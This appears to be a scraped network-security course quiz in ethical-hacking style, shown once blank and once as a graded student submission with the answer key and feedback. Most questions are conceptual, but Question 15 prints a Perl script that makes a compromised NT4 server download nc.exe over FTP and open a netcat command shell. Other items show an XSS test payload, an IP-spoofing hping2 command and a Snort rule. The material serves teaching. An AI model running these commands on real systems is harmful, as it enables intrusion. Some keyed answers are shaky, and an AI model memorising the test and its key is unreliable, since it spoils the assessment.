Vous êtes sur la page 1sur 28

Take Test: Part 3

Content
Assistive Technology Tips [opens in new window]
Instructions
Description
w
Instructions
Multiple Attempts This test allows multiple attempts.
Force Completion This test can be saved and resumed later.
Question Completion Status:

Save and Submit

QUESTI ON 1
1. Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge
cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from
Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to verify
her password with him ''just to double check our records.'' Jane does not suspect anything amiss,
and parts with her password. Jack can now access Brown Co.'s computers with a valid user name
and password, to steal the cookie recipe. What kind of attack is being illustrated here?


a.
Faking Identity

b.
Spoofing Identity

c.
Reverse Psychology

d.
Reverse Engineering
1 points
QUESTI ON 2
1. Which of the following activities would not be considered passive footprinting?


a.
Scan the range of IP address found in their DNS database


b.
Go through the rubbish to find out any information that might have been discarded

c.
Perform multiple queries through a search engine

d.
Search on financial site such as Yahoo Financial
1 points
QUESTI ON 3
1. An nmap command that includes the host specification of 202.176.56-57.* will scan _______
number of hosts.


a.
Over 10,000

b.
512

c.
256

d.
2
1 points
QUESTI ON 4
1. Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility
is to ensure that all physical and logical aspects of the city's computer network are secure from all
angles. Bill is an IT technician that works with Hampton in the same IT department. Bill's primary
responsibility is to keep PC's and servers up to date and to keep track of all the agency laptops that
the company owns and lends out to its employees. After Bill setup a wireless network for the
agency, Hampton made sure that everything was secure. He instituted encryption, rotating keys,
turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only
company laptops are allowed to use the wireless network, so Hampton entered all the MAC
addresses for those laptops into the wireless security utility so that only those laptops should be
able to access the wireless network.




Hampton does not keep track of all the laptops, but he is pretty certain that the agency only
purchases Dell laptops. Hampton is curious about this because he notices Bill working on a
Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions,
Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba laptop instead of
the usual Dell. Bill's boss said no, so now Hampton is very curious to see how Bill is accessing
the Internet. Hampton does site surveys every couple of days, and has yet to see any outside
wireless network signals inside the company's building.




How was Bill able to get Internet access without using an agency laptop?


a.
Toshiba and Dell laptops share the same hardware address

b.
Bill connected to a Rogue access point

c.
Bill brute forced the Mac address ACLs


d.
Bill spoofed the MAC address of Dell laptop
1 points
QUESTI ON 5
1. You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct
assesments to protect the company's network. During one of your periodic checks to see how well
policy is being observed by the employees, you discover an employee has attached a modem to his
telephone line and workstation. He has used this modem to dial in to his workstation, thereby
bypassing your firewall. A security breach has occurred as a direct result of this activity. The
employee explains that he used the modem because he had to download software for a department
project. How would you resolve this situation?


a.
Enforce the corporate security policy


b.
Install a network-based IDS

c.
Conduct a needs analysis

d.
Reconfigure the firewall
1 points
QUESTI ON 6
1.
What type of attack is shown in the above diagram?


a.
Identity Stealing Attack

b.
Session Hijacking Attack

c.
Man-in-the-Middle (MiTM) Attack

d.
SSL Spoofing Attack
1 points
QUESTI ON 7
1. Bob has a good understanding of cryptography, having worked with it for many years.



Cryptography is used to secure data from specific threats, but it does not secure the application
from coding errors. It can provide data privacy; integrity and enable strong authentication but it
cannot mitigate programming errors. What is a good example of a programming error that Bob
can use to explain to the management how encryption will not address all their security
concerns?


a.
Bob can explain that using a weak key management technique is a form of programming
error

b.
Bob can explain that a random number generator can be used to derive cryptographic keys
but it uses a weak seed value and this is a form of a programming error

c.
. Bob can explain that a buffer overflow is an example of programming error and it is a
common mistake associated with poor programming technique

d.
Bob can explain that using passwords to derive cryptographic keys is a form of a
programming error
1 points
QUESTI ON 8
1.

You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't
get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any
information.




What should you do next?


a.
Run nmap XMAS scan against 192.168.1.10

b.
Use NetScan Tools Pro to conduct the scan

c.
Run NULL TCP hping2 against 192.168.1.10


d.
The firewall is blocking all the scans to 192.168.1.10
1 points
QUESTI ON 9
1. You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco
router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement
numbers to successfully hijack the telnet session.




Take a look at the screenshot.




What are the next sequence and acknowledgement numbers that the router will send to the victim
machine?




Exhibit: 118-a.jpg


a.
Sequence number: 82980010 Acknowledgement number: 17768885


b.
Sequence number: 17768729 Acknowledgement number: 82980070

c.
Sequence number: 87000070 Acknowledgement number: 85320085


d.
Sequence number: 82980070 Acknowledgement number: 17768885

1 points
QUESTI ON 10
1.

An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't
want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful
in connecting to the system. The attacker rechecks that the target system is actually listening on
Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target
system. What could be the reason?


a.
He is attacking an operating system that does not reply to telnet even when open


b.
He needs to use an automated tool to telnet in

c.
The firewall is blocking port 23 to that system


d.
He cannot spoof his IP and successfully use TCP
1 points
QUESTI ON 11
1. Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself.



This causes the system to go into an infinite loop trying to resolve this unexpected connection.



Eventually, the connection times out, but during this resolution, the machine appears to hang or
become very slow. The attacker sends such packets on a regular basis to slow down the system.




Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks.



What type of Denial of Service attack is represented here?


a.
SMURF Attacks

b.
Targa attacks

c.
LAND attacks

d.
SYN Flood attacks
1 points
QUESTI ON 12
1. While testing web applications, you attempt to insert the following test script into the search area
on the company's web site:




<script>alert('Testing Testing Testing')</script>




Afterwards, when you press the search button, a pop up box appears on your screen with the text
"Testing Testing Testing". What vulnerability is detected in the web application here?


a.
Cross Site Scripting

b.
A hybrid attack

c.
A buffer overflow

d.
Password attacks
1 points
QUESTI ON 13
1.

Study the snort rule given below and interpret the rule.




alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)


a.
An alert is generated when a TCP packet originating from any IP address is seen on the
network and destined for any IP address on the 192.168.1.0 subnet on port 111

b.
. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0
subnet and destined to any IP on port 111

c.
An alert is generated when any packet other than a TCP packet is seen on the network and
destined for the 192.168.1.0 subnet

d.
. An alert is generated when a TCP packet is originated from port 111 of any IP address to
the 192.168.1.0 subnet

1 points
QUESTI ON 14
1. Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned how
to use these tools in his lab and is now ready for real world exploitation. He was able to effectively
intercept communications between two entities and establish credentials with both sides of the
connections. The two remote ends of the communication never notice that Eric was relaying the
information between the two. What would you call this attack?


a.
Poisoning Attack

b.
Interceptor

c.
Arp Proxy

d.
Man-in-the-middle
1 points
QUESTI ON 15
1. You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web
server. While it is effective, you find it tedious to perform extended functions. On further research
you come across a perl script that runs the following msadc functions:




system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host
-C \"echo $user>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
get hacked.html>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo quit>>sasfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); $o=<STDIN>;
print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");






What kind of exploit is indicated by this script?


a.
A buffer under runexploit

b.
A SUID exploit

c.
A buffer overflowexploit


d.
A chained exploit

e.
A SQL injectionexploit
1 points
QUESTI ON 16
1. Sabotage, Advertising and Covering are the three stages of _____


a.
Rapid Development Engineering

b.
Reverse Software Engineering

c.
Social engineering

d.
Reverse Social Engineering

1 points
QUESTI ON 17
1. You are conducting an IdleScan manually using Hping2. During the scanning process, you notice
that almost every query increments the IPID - regardless of the port being queried. One or two of
the queries cause the IPID to increment by more than one value. Which of the following options
would be a possible reason?


a.
A stateful inspection firewall is resetting your queries


b.
The zombie you are using is not truly idle


c.
Hping2 cannot be used for idlescanning


d.
These ports are actually open on the target system
1 points
QUESTI ON 18
1. While performing ping scans into a target network you get a frantic call from the organization's
security team. They report that they are under a denial of service attack. When you stop your scan,
the smurf attack event stops showing up on the organization's IDS monitors. How can you modify
your scan to prevent triggering this event in the IDS?


a.
Spoof the source IP address

b.
Only scan the Windows systems

c.
Scan more slowly


d.
Do not scan the broadcast IP
1 points
QUESTI ON 19
1. While doing a penetration test, you discover that the organization is using one domain for web
publishing and another domain for administration and business operations. During what phase of
the penetration test would you normally discover this?


a.
Active Attack

b.
Vulnerability Mapping


c.
Port Scanning

d.
Passive Information Gathering
1 points
QUESTI ON 20
1. Harold is the senior security analyst for a small state agency in New York.He has no other security
professionals that work under him, so he has to do all the security-related tasks for the
agency.Coming from a computer hardware background, Harold does not have a lot of experience
with security methodologies and technologies, but he was the only one who applied for the
position.




Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of
traffic is being passed around, but the program he is using does not seem to be capturing
anything.He pours through the Sniffer's manual, but cannot find anything that directly relates to
his problem.Harold decides to ask the network administrator if he has any thoughts on the
problem.Harold is told that the Sniffer was not working because the agency's network is a
switched network, which cannot be sniffed by some programs without some tweaking.





What technique could Harold use to sniff his agency's switched network?


a.
Launch smurf attack against the switch


b.
ARP spoof the default gateway


c.
Flood the switch with ICMP packets

d.
Conduct MiTM against the switch
1 points
QUESTI ON 21
1.

The terrorist organizations are increasingly blocking all traffic from North America or from
Internet



Protocol addresses that point back to users who rely on the English language.




Hackers sometimes set a number of criteria for accessing their website. This information is
shared among the co-hackers. For example if you are using a machine with the Linux operating
system and the Netscape browser then you will have access to their website in a covert way.
When federal investigators using PCs running Windows and using Internet Explorer visited the
hackers' shared site, the hackers' system immediately mounted a distributed denial-of-service
attack against the federal system.




Companies today are engaging in tracking competitors' through reverse IP address lookup sites
like whois.com, which provide an IP address's domain. When the competitor visits the
companies website they are directed to a products page without discount and prices are marked
higher for their product. When normal users visit the website they are directed to a page with
full-blown product details along with attractive discounts. This is based on IP-based blocking,
where certain addresses are barred from accessing a site.




What is this masking technique called?


a.
Mirroring Website

b.
Website Cloaking

c.
Website Filtering

d.
IP Access Blockade
1 points
QUESTI ON 22
1.

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social
engineering, you know that they are enforcing strong passwords. You understand that all users
are required to use passwords that are at least 8 characters in length. All passwords must also use
3 of the 4 following categories: lower case letters, capital letters, numbers and special
characters.




With your given knowledge of users, likely user account names and the possibility that they will
choose the easiest passwords possible, what would be the fastest type of password cracking
attack you can run against these hash values to get results?


a.
Encryption Attack

b.
Dictionary Attack

c.
Hybrid Attack

d.
Brute Force Attack
1 points
QUESTI ON 23
1. Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has
created a security policy requiring all employees to use complex 14 character passwords.



Unfortunately, the members of management do not want to have to use such long complicated
passwords so they tell Harold's boss this new password policy should not apply to them. To
comply with the management's wishes, the IT department creates another Windows domain and
moves all the management users to that domain. This new domain has a password policy only
requiring 8 characters.




Harold is concerned about having to accommodate the managers, but cannot do anything about
it.



Harold is also concerned about using LanManager security on his network instead of NTLM or
NTLMv2, but the many legacy applications on the network prevent using the more secure
NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the
new domain using Pwdump6.




Harold uses the password cracking software John the Ripper to crack users' passwords to make
sure they are strong enough.?Harold expects that the users' passwords in the original domain will
take much longer to crack than the management's passwords in the new domain. After running
the software, Harold discovers that the 14 character passwords only took a short time longer to
crack than the 8 character passwords.




Why did the 14 character passwords not take much longer to crack than the 8 character
passwords?





a.
Harold should have used Dumpsec instead of Pwdump6

b.
LanManger hashes are broken up into two 7 character fields


c.
Harold should use LC4 instead of John the Ripper


d.
Harold's dictionary file was not large enough

1 points
QUESTI ON 24
1. Hping2 is a powerful packet crafter tool that can be used to penetrate firewalls by creating custom



TCP

What does the following command do?



CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f
192.168.0.9


a.
This command will generate a single TCP SYN packet with source port 1037, destination
port 22, with a sequence number 15 spoofing the IP address 10.0.0.6


b.
This command will generate a single TCP UDP packet with source port 1037, destination
port 15, with a sequence number 22 spoofing the IP address 192.168.0.9

c.
This command will generate a multiple TCP SYN/ACK packets with source port 22,
destination port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9

d.
This command will generate multiple TCP SYN packets with source port 1037, destination
port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
1 points
QUESTI ON 25
1. You are attempting to map out the firewall policy for an organization. You discover your target
system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of
the target system starting at port 1 and going up to port 1024. What is this process known as?


a.
Footprinting

b.
Idle scanning

c.
Enumeration

d.
Firewalking
1 points
Click Save and Submit to save and submit. Click Save All Answers to save all answers.

Save and Submit




















Current Location
1. NET/INTERNET SEC


2. Assignments

3. Quizzes

4. Review Test Submission: Part 3

Menu Management Options


Course Menu:
NET/INTERNET SEC

Announcements
Faculty Information
My Grades
Email
Help
Syllabus
Course Documents
Assignments
Discussion Board
External Links
Help
Review Test Submission: Part 3

Content
User Ranjeeta kaur Keskar
Course NET/INTERNET SEC
Test Part 3
Started 10/2/14 10:41 AM
Submitted 10/2/14 12:09 PM
Status Completed
Attempt Score 24 out of 25 points
Time Elapsed 1 hour, 27 minutes
Instructions
Question 1
1 out of 1 points

Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge
cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator
from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her

to verify her password with him ''just to double check our records.'' Jane does not suspect
anything amiss, and parts with her password. Jack can now access Brown Co.'s computers
with a valid user name and password, to steal the cookie recipe. What kind of attack is being
illustrated here?

Selected Answer:
b.
Spoofing Identity
Correct Answer:
b.
Spoofing Identity
Response
Feedback:
This is a typical case of pretexting. Pretexting is the act of creating and using an
invented scenario (the pretext) to persuade a target to release information or
perform an action and is usually done over the telephone.

Question 2
1 out of 1 points

Which of the following activities would not be considered passive footprinting?


Selected Answer:
a.
Scan the range of IP address found in their DNS database

Correct Answer:
a.
Scan the range of IP address found in their DNS database

Response
Feedback:
Passive footprinting is a method in which the attacker never makes contact
with the target.



Scanning the targets IP addresses can be logged at the target and therefore
contact has been made.

Question 3
1 out of 1 points

An nmap command that includes the host specification of 202.176.56-57.* will scan _______
number of hosts.


Selected Answer:
b.
512
Correct Answer:
b.
512
Response
Feedback:
The hosts with IP address 202.176.56.0-255 & 202.176.56.0-255 will be
scanned (256+256=512)

Question 4
0 out of 1 points

Hampton is the senior security analyst for the city of Columbus in Ohio. His primary
responsibility is to ensure that all physical and logical aspects of the city's computer network
are secure from all angles. Bill is an IT technician that works with Hampton in the same IT
department. Bill's primary responsibility is to keep PC's and servers up to date and to keep
track of all the agency laptops that the company owns and lends out to its employees. After
Bill setup a wireless network for the agency, Hampton made sure that everything was secure.
He instituted encryption, rotating keys, turned off SSID broadcasting, and enabled MAC
filtering. According to agency policy, only company laptops are allowed to use the wireless
network, so Hampton entered all the MAC addresses for those laptops into the wireless
security utility so that only those laptops should be able to access the wireless network.




Hampton does not keep track of all the laptops, but he is pretty certain that the agency only
purchases Dell laptops. Hampton is curious about this because he notices Bill working on a
Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to
conclusions, Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba
laptop instead of the usual Dell. Bill's boss said no, so now Hampton is very curious to see
how Bill is accessing the Internet. Hampton does site surveys every couple of days, and has
yet to see any outside wireless network signals inside the company's building.




How was Bill able to get Internet access without using an agency laptop?


Selected Answer:
d.
Bill spoofed the MAC address of Dell laptop
Correct Answer:
b.
Bill connected to a Rogue access point
Response Feedback:
NA

Question 5
1 out of 1 points

You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct
assesments to protect the company's network. During one of your periodic checks to see how
well policy is being observed by the employees, you discover an employee has attached a
modem to his telephone line and workstation. He has used this modem to dial in to his
workstation, thereby bypassing your firewall. A security breach has occurred as a direct result
of this activity. The employee explains that he used the modem because he had to download
software for a department project. How would you resolve this situation?


Selected Answer:
a.
Enforce the corporate security policy


Correct Answer:
a.
Enforce the corporate security policy

Response
Feedback:
The security policy is meant to always be followed until changed. If a need rises
to perform actions that might violate the security policy you'll have to find
another way to accomplish the task or wait until the policy has been changed.
Question 6
1 out of 1 points


What type of attack is shown in the above diagram?


Selected Answer:
c.
Man-in-the-Middle (MiTM) Attack
Correct Answer:
c.

Man-in-the-Middle (MiTM) Attack
Response
Feedback:
A man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to
read, insert and modify at will, messages between two parties without either
party knowing that the link between them has been compromised.
Question 7
1 out of 1 points

Bob has a good understanding of cryptography, having worked with it for many years.



Cryptography is used to secure data from specific threats, but it does not secure the
application from coding errors. It can provide data privacy; integrity and enable strong
authentication but it cannot mitigate programming errors. What is a good example of a
programming error that Bob can use to explain to the management how encryption will not
address all their security concerns?


Selected
Answer:
c.
. Bob can explain that a buffer overflow is an example of programming error and
it is a common mistake associated with poor programming technique
Correct
Answer:
c.
. Bob can explain that a buffer overflow is an example of programming error and
it is a common mistake associated with poor programming technique
Response
Feedback:
A buffer overflow occurs when you write a set of values (usually a string of
characters) into a fixed length buffer and write at least one value outside that
buffer's boundaries (usually past its end). A buffer overflow can occur when
reading input from the user into a buffer, but it can also occur during other kinds
of processing in a program. Technically, a buffer overflow is a problem with the
program's internal implementation.

Question 8
1 out of 1 points


You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10
don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any
information.




What should you do next?


Selected Answer:
c.
Run NULL TCP hping2 against 192.168.1.10


Correct Answer:
c.
Run NULL TCP hping2 against 192.168.1.10

Response Feedback:
NA
Question 9
1 out of 1 points

You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to
Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and
acknowledgement numbers to successfully hijack the telnet session.




Take a look at the screenshot.




What are the next sequence and acknowledgement numbers that the router will send to the
victim machine?




Exhibit: 118-a.jpg


Selected Answer:
d.
Sequence number: 82980070 Acknowledgement number: 17768885

Correct Answer:
d.
Sequence number: 82980070 Acknowledgement number: 17768885

Response Feedback:
NA

Question 10
1 out of 1 points


An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker
doesn't want to get caught and is spoofing his IP address. After numerous tries he remains
unsuccessful in connecting to the system. The attacker rechecks that the target system is
actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to
connect to the target system. What could be the reason?


Selected Answer:
d.

He cannot spoof his IP and successfully use TCP
Correct Answer:
d.
He cannot spoof his IP and successfully use TCP
Response
Feedback:
Spoofing your IP will only work if you don't need to get an answer from the
target system. In this case the answer (login prompt) from the telnet session will
be sent to the "real" location of the IP address that you are showing as the
connection initiator.
Question 11
1 out of 1 points

Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with
itself.



This causes the system to go into an infinite loop trying to resolve this unexpected
connection.



Eventually, the connection times out, but during this resolution, the machine appears to hang
or become very slow. The attacker sends such packets on a regular basis to slow down the
system.




Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks.



What type of Denial of Service attack is represented here?


Selected Answer:
c.
LAND attacks
Correct Answer:
c.
LAND attacks
Response Feedback:
NA

Question 12
1 out of 1 points

While testing web applications, you attempt to insert the following test script into the search
area on the company's web site:





<script>alert('Testing Testing Testing')</script>




Afterwards, when you press the search button, a pop up box appears on your screen with the
text "Testing Testing Testing". What vulnerability is detected in the web application here?

Selected Answer:
a.
Cross Site Scripting
Correct Answer:
a.
Cross Site Scripting
Response
Feedback:
Cross-site scripting (XSS) is a type of computer security vulnerability typically
found in web applications which allow code injection by malicious web users into
the web pages viewed by other users. Examples of such code include HTML code
and client-side scripts. An exploited cross-site scripting vulnerability can be used
by attackers to bypass access controls such as the same origin policy.

Question 13
1 out of 1 points


Study the snort rule given below and interpret the rule.




alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)


Selected
Answer:
a.
An alert is generated when a TCP packet originating from any IP address is seen
on the network and destined for any IP address on the 192.168.1.0 subnet on port
111
Correct
Answer:
a.
An alert is generated when a TCP packet originating from any IP address is seen
on the network and destined for any IP address on the 192.168.1.0 subnet on port
111
Response
Feedback:
Refer to the online documentation on creating Snort rules
athttp://snort.org/docs/snort_htmanuals/htmanual_261/node147.html

Question 14
1 out of 1 points

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned
how to use these tools in his lab and is now ready for real world exploitation. He was able to
effectively intercept communications between two entities and establish credentials with both

sides of the connections. The two remote ends of the communication never notice that Eric
was relaying the information between the two. What would you call this attack?

Selected Answer:
d.
Man-in-the-middle
Correct Answer:
d.
Man-in-the-middle
Response
Feedback:
A man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to
read, insert and modify at will, messages between two parties without either
party knowing that the link between them has been compromised.

Question 15
1 out of 1 points

You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web
server. While it is effective, you find it tedious to perform extended functions. On further
research you come across a perl script that runs the following msadc functions:




system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h
$host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
get hacked.html>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo quit>>sasfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
$o=<STDIN>; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e
cmd.exe\"");






What kind of exploit is indicated by this script?


Selected Answer:
d.
A chained exploit
Correct Answer:
d.
A chained exploit
Response Feedback:
NA

Question 16
1 out of 1 points

Sabotage, Advertising and Covering are the three stages of _____


Selected Answer:
d.
Reverse Social Engineering

Correct Answer:
d.
Reverse Social Engineering

Response
Feedback:
Typical social interaction dictates that if someone gives us something then it is
only right for us to return the favour. This is known as reverse social engineering,
when an attacker sets up a situation where the victim encounters a problem, they
ask the attacker for help and once the problem is solved the victim then feels
obliged to give the information requested by the attacker.

Question 17
1 out of 1 points

You are conducting an IdleScan manually using Hping2. During the scanning process, you
notice that almost every query increments the IPID - regardless of the port being queried. One
or two of the queries cause the IPID to increment by more than one value. Which of the
following options would be a possible reason?


Selected Answer:
b.
The zombie you are using is not truly idle

Correct Answer:
b.
The zombie you are using is not truly idle

Response
Feedback:
If the IPID is incremented by more than the normal increment for this type of
system it means that the system is interacting with some other system beside
yours and has sent packets to an unknown host between the packets destined for
you.

Question 18
1 out of 1 points

While performing ping scans into a target network you get a frantic call from the
organization's security team. They report that they are under a denial of service attack. When
you stop your scan, the smurf attack event stops showing up on the organization's IDS
monitors. How can you modify your scan to prevent triggering this event in the IDS?


Selected Answer:
d.
Do not scan the broadcast IP
Correct Answer:
d.
Do not scan the broadcast IP
Response
Feedback:
Scanning the broadcast address makes the scan target all IP addresses on that

subnet at the same time.
Question 19
1 out of 1 points

While doing a penetration test, you discover that the organization is using one domain for web
publishing and another domain for administration and business operations. During what phase
of the penetration test would you normally discover this?


Selected Answer:
d.
Passive Information Gathering
Correct Answer:
d.
Passive Information Gathering
Response Feedback:
NA

Question 20
1 out of 1 points

Harold is the senior security analyst for a small state agency in New York.He has no other
security professionals that work under him, so he has to do all the security-related tasks for the
agency.Coming from a computer hardware background, Harold does not have a lot of
experience with security methodologies and technologies, but he was the only one who
applied for the position.




Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind
of traffic is being passed around, but the program he is using does not seem to be capturing
anything.He pours through the Sniffer's manual, but cannot find anything that directly relates
to his problem.Harold decides to ask the network administrator if he has any thoughts on the
problem.Harold is told that the Sniffer was not working because the agency's network is a
switched network, which cannot be sniffed by some programs without some tweaking.




What technique could Harold use to sniff his agency's switched network?


Selected Answer:
b.
ARP spoof the default gateway

Correct Answer:
b.
ARP spoof the default gateway

Response
Feedback:
ARP spoofing, also known as ARP poisoning, is a technique used to attack an
Ethernet network which may allow an attacker to sniff data frames on a local area

network (LAN) or stop the traffic altogether (known as a denial of service attack).
The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an
Ethernet LAN. These frames contain false MAC addresses, confusing network
devices, such as network switches. As a result frames intended for one machine
can be mistakenly sent to another (allowing the packets to be sniffed) or an
unreachable host (a denial of service attack).
Question 21
1 out of 1 points


The terrorist organizations are increasingly blocking all traffic from North America or from
Internet



Protocol addresses that point back to users who rely on the English language.




Hackers sometimes set a number of criteria for accessing their website. This information is
shared among the co-hackers. For example if you are using a machine with the Linux
operating system and the Netscape browser then you will have access to their website in a
covert way. When federal investigators using PCs running Windows and using Internet
Explorer visited the hackers' shared site, the hackers' system immediately mounted a
distributed denial-of-service attack against the federal system.




Companies today are engaging in tracking competitors' through reverse IP address lookup
sites like whois.com, which provide an IP address's domain. When the competitor visits the
companies website they are directed to a products page without discount and prices are
marked higher for their product. When normal users visit the website they are directed to a
page with full-blown product details along with attractive discounts. This is based on IP-based
blocking, where certain addresses are barred from accessing a site.




What is this masking technique called?


Selected Answer:
b.
Website Cloaking
Correct Answer:
b.
Website Cloaking

Response
Feedback:
Website Cloaking travels under a variety of alias including Stealth, Stealth
scripts, IP delivery, Food Script, and Phantom page technology. It's hot- due to
its ability to manipulate those elusive top-ranking results from spider search
engines.
Question 22
1 out of 1 points


You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using
social engineering, you know that they are enforcing strong passwords. You understand that
all users are required to use passwords that are at least 8 characters in length. All passwords
must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and
special characters.




With your given knowledge of users, likely user account names and the possibility that they
will choose the easiest passwords possible, what would be the fastest type of password
cracking attack you can run against these hash values to get results?


Selected Answer:
c.
Hybrid Attack
Correct Answer:
c.
Hybrid Attack
Response
Feedback:
A dictionary attack will not work as strong passwords are enforced, also the
minimum length of 8 characters in the password makes a brute force attack time
consuming. A hybrid attack where you take a word from a dictionary and
exchange a number of letters with numbers and special characters will probably
be the fastest way to crack the passwords.

Question 23
1 out of 1 points

Harold works for Jacobson Unlimited in the IT department as the security manager. Harold
has created a security policy requiring all employees to use complex 14 character passwords.



Unfortunately, the members of management do not want to have to use such long complicated
passwords so they tell Harold's boss this new password policy should not apply to them. To
comply with the management's wishes, the IT department creates another Windows domain
and moves all the management users to that domain. This new domain has a password policy
only requiring 8 characters.





Harold is concerned about having to accommodate the managers, but cannot do anything
about it.



Harold is also concerned about using LanManager security on his network instead of NTLM
or NTLMv2, but the many legacy applications on the network prevent using the more secure
NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and
the new domain using Pwdump6.




Harold uses the password cracking software John the Ripper to crack users' passwords to
make sure they are strong enough.?Harold expects that the users' passwords in the original
domain will take much longer to crack than the management's passwords in the new domain.
After running the software, Harold discovers that the 14 character passwords only took a short
time longer to crack than the 8 character passwords.




Why did the 14 character passwords not take much longer to crack than the 8 character
passwords?




Selected Answer:
b.
LanManger hashes are broken up into two 7 character fields

Correct Answer:
b.
LanManger hashes are broken up into two 7 character fields

Response Feedback:
NA

Question 24
1 out of 1 points

Hping2 is a powerful packet crafter tool that can be used to penetrate firewalls by creating
custom



TCP

What does the following command do?




CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f
192.168.0.9

Selected
Answer:
a.
This command will generate a single TCP SYN packet with source port 1037,
destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6

Correct
Answer:
a.
This command will generate a single TCP SYN packet with source port 1037,
destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6

Response Feedback:
NA

Question 25
1 out of 1 points

You are attempting to map out the firewall policy for an organization. You discover your
target system is one hop beyond the firewall. Using hping2, you send SYN packets with the
exact TTL of the target system starting at port 1 and going up to port 1024. What is this
process known as?


Selected Answer:
d.
Firewalking
Correct Answer:
d.
Firewalking
Response
Feedback:
Firewalking uses a traceroute-like IP packet analysis to determine whether or
not a particular packet can pass from the attacker's host to a destination host
through a packet-filtering device.



This technique can be used to map 'open' or 'pass through' ports on a gateway.
More over, it can determine whether packets with various control information
can pass through a given gateway.

Thursday, October 2, 2014 12:09:13 PM CDT
OK